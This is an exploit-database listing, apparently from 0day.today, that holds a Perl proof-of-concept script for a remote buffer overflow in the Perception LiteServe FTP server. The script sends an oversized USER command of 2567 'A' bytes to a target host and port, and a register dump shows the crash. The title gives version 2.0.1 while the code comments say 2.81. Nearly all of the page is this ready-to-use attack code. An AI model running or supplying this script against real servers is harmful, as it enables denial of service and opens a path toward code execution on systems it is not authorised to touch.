[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC

Author
Houssamix
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6709
Category
dos / poc
Date add
07-01-2009
Platform
unsorted
============================================================
Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC
============================================================






#!/bin/perl

# LiteServe 2.81 Remote buffer overflow Poc (user)
# download : http://www.cmfperception.com/liteserve/pls2_81.exe

# -------------------------------------
# EAX 00000001
# ECX 7FFDF000
# EDX 41414155
# EBX 010ED8EC ASCII "AAAAAAAAAAAA"
# ESP 0012E414
# EBP 0012E45C
# ESI 41414141
# EDI 41414155
# EIP 7C911010 ntdll.7C911010

# Access violation When Reading [41414169]
# --------------------------------------

use IO::Socket;
print "[+] Author : HouSSaMix \n";
print "[+] LiteServe 2.81 Remote buffer overflow Poc \n";

if (@ARGV < 2)
{
 print "[*] Usage: hsmx.pl host port\n";
 print "[*] Exemple: hsmx.pl 127.0.0.1 21\n";
 exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];

$cc = "\x41" x 2567  ;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending bad request...\n";
print $socket "USER $cc\n";
sleep(5);
close($socket);

print "[+] bad request sent \n";



#  0day.today [2024-12-27]  #